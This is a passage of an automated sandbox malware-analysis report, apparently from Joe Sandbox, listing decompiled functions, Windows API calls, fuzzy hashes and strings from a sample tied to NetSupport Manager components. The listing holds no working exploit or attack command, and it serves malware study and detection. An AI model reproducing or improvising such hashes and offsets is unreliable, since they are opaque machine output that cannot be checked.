                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocCreateFreeLockPaletteUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3539721555-0
                                                                                                                        • Opcode ID: 39dde38b983d520eb1592ee6ff7fb67f3a6504c7f0104fed9e815ca6d2fa9450
                                                                                                                        • Instruction ID: cab6ae7ab9e262d75e9db768a98ab887988d45630aa72f548ae65750aa94246a
                                                                                                                        • Opcode Fuzzy Hash: 39dde38b983d520eb1592ee6ff7fb67f3a6504c7f0104fed9e815ca6d2fa9450
                                                                                                                        • Instruction Fuzzy Hash: 06217C714053909BC7118F7888557AAFFF8EF16311F1881EEE988873D1D67B9944C7A1
                                                                                                                        Function 00AF6E70 Relevance: 7.6, APIs: 5, Instructions: 76memorycomCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(00B6B478,00000000,00000001,00B6B488,?), ref: 00AF6E92
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AF6EB9
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AF6ED2
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00AF6F0A
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00AF6F0D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFree$CreateInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1867060851-0
                                                                                                                        • Opcode ID: 5fb329e0e9cd0455417a27a14becbbc5c8818956e817b24fbd666ec2abc31d7b
                                                                                                                        • Instruction ID: ce395c9cd6379316414d698dea29233c37c124d054ce2ef4811aae4ffc27432e
                                                                                                                        • Opcode Fuzzy Hash: 5fb329e0e9cd0455417a27a14becbbc5c8818956e817b24fbd666ec2abc31d7b
                                                                                                                        • Instruction Fuzzy Hash: 63215E75600208AFCB00DFA9DC85E9AB7FDEF89310B1041A5F908DB351DA74EE05CBA0
                                                                                                                        Function 00AFB0E0 Relevance: 7.6, APIs: 5, Instructions: 76registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 00AFB10B
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00AFB14B
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFB1A3
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AFB1AB
                                                                                                                          • Part of subcall function 00AFB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00AFB196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$CloseDeleteOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2095303065-0
                                                                                                                        • Opcode ID: 8f7efc34cd77b7501c04d07c955202e79333c7cb2becf2a7c941f09606fdb16e
                                                                                                                        • Instruction ID: 0f992d00b79ba2c1c27ef2b6c5c935d3028c5b7c451076a511e055e82067932a
                                                                                                                        • Opcode Fuzzy Hash: 8f7efc34cd77b7501c04d07c955202e79333c7cb2becf2a7c941f09606fdb16e
                                                                                                                        • Instruction Fuzzy Hash: 1D213EB590021DAADB21DB94DC48FFB73BCEB48704F008289FA1993151DA70AE448F74
                                                                                                                        Function 00B3A205 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00B3A213
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _free.LIBCMT ref: 00B3A226
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: 140a332991cbb5f96e75cdf412c0fe3a9f24b43052313fc6da659bdfe37fdf24
                                                                                                                        • Instruction ID: d539c19a21ad28cb06300443acc253233486194b87ca358f348a68a95e3a3823
                                                                                                                        • Opcode Fuzzy Hash: 140a332991cbb5f96e75cdf412c0fe3a9f24b43052313fc6da659bdfe37fdf24
                                                                                                                        • Instruction Fuzzy Hash: 4911C632944611BBCF213BB4AC05A6B3FD9EF81360F3045E6F8889B691DE36D940C795
                                                                                                                        Function 00B16390 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(00B18D38,?,?,00B18D38,?), ref: 00B163B6
                                                                                                                        • __wcsdup.LIBCMT ref: 00B163D1
                                                                                                                          • Part of subcall function 00B16390: _free.LIBCMT ref: 00B163FA
                                                                                                                        • _free.LIBCMT ref: 00B16408
                                                                                                                          • Part of subcall function 00B379A7: HeapFree.KERNEL32(00000000,00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379BD
                                                                                                                          • Part of subcall function 00B379A7: GetLastError.KERNEL32(00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379CF
                                                                                                                        • CreateDirectoryW.KERNEL32(00B18D38,00000000,?,?,?,00B18D38,?), ref: 00B16413
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__wcsdup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3120057194-0
                                                                                                                        • Opcode ID: 265e42e5b852edb06a859b57a14ec4474741364dceaf39800857fb19a4518233
                                                                                                                        • Instruction ID: b8c1dff9a6bcfe4a6f45e395bf5af9ca2b5de4f985d85357c19a342836a81682
                                                                                                                        • Opcode Fuzzy Hash: 265e42e5b852edb06a859b57a14ec4474741364dceaf39800857fb19a4518233
                                                                                                                        • Instruction Fuzzy Hash: 480192766012152BE720267DBC03BFB37D9CFC1770F5845BAF809C7291FA62E99641A2
                                                                                                                        Function 00B046E0 Relevance: 7.5, APIs: 5, Instructions: 38serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00B046ED
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,00000004), ref: 00B04701
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B04712
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B0471F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B04726
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2623946379-0
                                                                                                                        • Opcode ID: 180284a906c11fb0b1d43efdbc713d423afabdd6934a4d8d3738dd0b59df2efb
                                                                                                                        • Instruction ID: b02bcff7d53e92fb799589bd14f364d3bb1401f0efecccabbae2b520da9a5089
                                                                                                                        • Opcode Fuzzy Hash: 180284a906c11fb0b1d43efdbc713d423afabdd6934a4d8d3738dd0b59df2efb
                                                                                                                        • Instruction Fuzzy Hash: 5AF08276241520BBEA211B24AC49FAB3B6CDB86B61F044105FB15CB2D0DFB98C018670
                                                                                                                        Function 00B42925 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B42931
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __getptd.LIBCMT ref: 00B42948
                                                                                                                        • __amsg_exit.LIBCMT ref: 00B42956
                                                                                                                        • __lock.LIBCMT ref: 00B42966
                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00B4297A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 938513278-0
                                                                                                                        • Opcode ID: 8cf77e1eb217dbaa63e3bdb7651ff06799d16b11fdbfcc3706bc65844a6f29da
                                                                                                                        • Instruction ID: abe6d03aa0ec28208158c6efdd8dc0b9cef6baee044176ccaadbce3a142c92e4
                                                                                                                        • Opcode Fuzzy Hash: 8cf77e1eb217dbaa63e3bdb7651ff06799d16b11fdbfcc3706bc65844a6f29da
                                                                                                                        • Instruction Fuzzy Hash: 8CF09032940701ABDA24BBB89847B5D37E0EF04B20FE441E9F405A72D2CF644B42FB55
                                                                                                                        Function 00AEA380 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00AEA3D6
                                                                                                                          • Part of subcall function 00B049E0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?), ref: 00B04A0B
                                                                                                                          • Part of subcall function 00B04B90: RegQueryValueExW.ADVAPI32(00020019,?,00000000,80000002,80000002,00020019,?,75BF73E0,00000010,?,?,00AE63B6,?,?,?,80000002), ref: 00B04BB8
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AEA4A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateQueryValue__wcsicollwsprintf
                                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\Class\%s$UpperFilters
                                                                                                                        • API String ID: 930263728-1035810585
                                                                                                                        • Opcode ID: 989f1ec60d7602ad5d8436295b527593d2e35c81489d3cd74533b5a0f430383f
                                                                                                                        • Instruction ID: ae63ec90dc8700823aaa64bcc40ac18fdad98f724dbdaf4c6c703f1bf170fb08
                                                                                                                        • Opcode Fuzzy Hash: 989f1ec60d7602ad5d8436295b527593d2e35c81489d3cd74533b5a0f430383f
                                                                                                                        • Instruction Fuzzy Hash: CA712B31A002599BCB24DF14CC55AFAB7B5FFA4300F5445D9E806A7284E7B1BF85CB91
                                                                                                                        Function 00AE4660 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B049E0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?), ref: 00B04A0B
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B044E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,5E06C67B,00000000,00000000), ref: 00B0452B
                                                                                                                        • _malloc.LIBCMT ref: 00AE4790
                                                                                                                        • _free.LIBCMT ref: 00AE4835
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEnumOpen_free_malloc
                                                                                                                        • String ID: IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                                                        • API String ID: 294233710-2474120780
                                                                                                                        • Opcode ID: 7fa44f9e8ef9e959c13abb750cd76f92f538e37d6c1e75d4b6b39a2eb3e7cd68
                                                                                                                        • Instruction ID: d977ad22e265b3d2a8d5ca9b9c1ab97d202c76a814de6f68b906014051d12297
                                                                                                                        • Opcode Fuzzy Hash: 7fa44f9e8ef9e959c13abb750cd76f92f538e37d6c1e75d4b6b39a2eb3e7cd68
                                                                                                                        • Instruction Fuzzy Hash: 236181B6900149ABDB00EF94DC95EEFBBBCEF59314F104159F911A32C1EB70AA04CBA1
                                                                                                                        Function 00B054E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B04AE0: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B04AFD
                                                                                                                        • _malloc.LIBCMT ref: 00B055A8
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • wsprintfW.USER32 ref: 00B055F5
                                                                                                                        • _free.LIBCMT ref: 00B05679
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeapOpenQueryValue_free_mallocwsprintf
                                                                                                                        • String ID: %s\%s
                                                                                                                        • API String ID: 2497104544-4073750446
                                                                                                                        • Opcode ID: 993fa360edd2a56cae60963edded1005d26c5ae7873af1cf5156731dd402203b
                                                                                                                        • Instruction ID: d8c34bca6be5cb075f0a7424a034b609233ffc71a94ba88ad6bec56759e389c8
                                                                                                                        • Opcode Fuzzy Hash: 993fa360edd2a56cae60963edded1005d26c5ae7873af1cf5156731dd402203b
                                                                                                                        • Instruction Fuzzy Hash: 635151B190062C9FDB30DB54DC81BEEB7B9EB94710F0442D9E91563281EB726E54CFA4
                                                                                                                        Function 00AF4FA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AF4FE1
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF502B
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF509A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$__wcsicoll
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 2690171835-3788999226
                                                                                                                        • Opcode ID: ecddab2098c9f11eb0d1bcb324586d0039488c2222da8e0d344f5fb93373a81b
                                                                                                                        • Instruction ID: 2641991ca869bfbfacfdbe37dcfc555542d9d8f571cfa34df68a8a5251166460
                                                                                                                        • Opcode Fuzzy Hash: ecddab2098c9f11eb0d1bcb324586d0039488c2222da8e0d344f5fb93373a81b
                                                                                                                        • Instruction Fuzzy Hash: F841E472B0050A9FCB2CDAB4D89183AB365EB84316714877DFB1AD7680EA31ED5187D1
                                                                                                                        Function 00AF32D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                        • Opcode ID: 22fb22eed66352cec06a5584773c99daef17a7fd4109b8b4326aabdaeb37dbee
                                                                                                                        • Instruction ID: 77d2ca9fc03d26441b0c6544b6e97066b7f130162f6db415f8b981f3396d2451
                                                                                                                        • Opcode Fuzzy Hash: 22fb22eed66352cec06a5584773c99daef17a7fd4109b8b4326aabdaeb37dbee
                                                                                                                        • Instruction Fuzzy Hash: 873160337046188B8B24DEDEE89087AF3EAFFD5710310462EF656CB650DB71EA4487A4
                                                                                                                        Function 00B18EB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B18F85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                        • String ID: ..\CTL32\util.cpp$nsmdir >= 0 && nsmdir < GP_MAX$psz != szTempExpanded
                                                                                                                        • API String ID: 237503144-2386058402
                                                                                                                        • Opcode ID: b6e26f73b69f9ce1fd70907dc7982a26f198e52bb81b92164166cba9782eb80e
                                                                                                                        • Instruction ID: f8784d230decc5d0082fa70ca68736a281a5e085c447a36292977f8131969fb7
                                                                                                                        • Opcode Fuzzy Hash: b6e26f73b69f9ce1fd70907dc7982a26f198e52bb81b92164166cba9782eb80e
                                                                                                                        • Instruction Fuzzy Hash: D431E8B290030556DB30AF64DC56AEA73F6FB45300F5045E4E905E72A2FF709AC5CB92
                                                                                                                        Function 00B02CF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
